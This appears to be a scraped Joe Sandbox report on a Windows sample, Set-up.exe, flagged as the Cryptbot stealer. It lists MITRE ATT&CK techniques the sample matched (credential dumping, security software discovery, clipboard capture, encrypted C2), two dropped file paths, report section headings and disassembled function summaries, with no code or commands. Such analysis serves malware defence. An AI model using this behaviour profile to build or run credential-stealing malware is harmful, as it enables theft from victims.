Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Set-up.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Cryptbot

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\UwGCIJbIlmBudMOlckMv.dll

C:\Users\user\AppData\Local\Temp\service123.exe

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Windows Analysis Report
Set-up.exe

Function 6C3414B0 Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 121
COMMON

Function 0001116C Relevance: 19.7, APIs: 13, Instructions: 200
sleepstringCOMMON

Function 000115B0 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 121
COMMON

Function 6C359C22 Relevance: 15.1, APIs: 10, Instructions: 110
sleepclipboardCOMMON

Function 000181E0 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 116
libraryloaderCOMMON

Function 00018230 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 62
libraryloaderCOMMON

Function 000113C9 Relevance: 12.1, APIs: 8, Instructions: 109
stringCOMMON

Function 000111A3 Relevance: 10.6, APIs: 7, Instructions: 115
sleepstringCOMMON

Function 00011160 Relevance: 9.1, APIs: 6, Instructions: 131
sleepstringCOMMON

Function 6C359B70 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 32
sleepsynchronizationclipboardCOMMON

Function 00011296 Relevance: 5.1, APIs: 4, Instructions: 80
stringCOMMON

Function 000113BB Relevance: 5.1, APIs: 4, Instructions: 66
stringCOMMON

Function 6C35B3F0 Relevance: 1.4, APIs: 1, Instructions: 144
COMMON

Function 6C35B560 Relevance: 1.3, APIs: 1, Instructions: 95
COMMON